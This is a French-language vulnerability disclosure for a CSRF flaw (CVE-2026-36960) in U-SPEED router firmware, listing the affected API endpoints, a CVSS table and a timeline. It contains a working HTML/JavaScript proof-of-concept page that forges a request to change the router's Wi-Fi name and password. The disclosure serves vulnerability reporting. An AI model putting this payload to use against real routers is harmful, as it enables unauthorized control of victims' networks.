
Preuve de concept d'exploitation pour CVE-2026-36960, une vulnérabilité CSRF dans le firmware du routeur U-SPEED permettant des modifications de configuration non autorisées via des requêtes forgées.
ID CVE : CVE-2026-36960 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : U-SPEED Produit : Routeur U-SPEED Version du firmware : V1.0.0 CWE : CWE-352 - Cross-Site Request Forgery (CSRF)
Le firmware V1.0.0 du routeur U-SPEED ne met pas en œuvre de mécanismes de protection CSRF tels que des jetons anti-CSRF ou une validation stricte des en-têtes Origin/Referer pour les points de terminaison d'API administratifs. Un attaquant peut créer une page Web malveillante qui envoie des requêtes HTTP falsifiées vers les points de terminaison de configuration. Si un administrateur authentifié visite la page Web malveillante, le routeur traite la requête comme une action administrative légitime.
Score CVSS v3.1 : 8,8 (Élevé)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrique | Valeur |
|---|
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction utilisateur | Requise |
| Impact sur la confidentialité | Élevé |
| Impact sur l'intégrité | Élevé |
| Impact sur la disponibilité | Élevé |
| Point de terminaison | Fonction |
|---|---|
/api/setWlan | Configuration du réseau sans fil |
/api/telnet | Configuration du service Telnet |
| Autres points de terminaison de configuration | Diverses fonctions administratives |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportement attendu : La requête doit être rejetée en raison de l'absence de jeton CSRF. Comportement réel : Le routeur accepte et traite la requête falsifiée.
| Date | Événement |
|---|---|
| 2026-04-29 | Vulnérabilité découverte |
| 2026-04-29 | Signalée à MITRE |
| 2026-04-29 | CVE-2026-36960 attribuée |
| 2026-04-29 | Divulgation publique |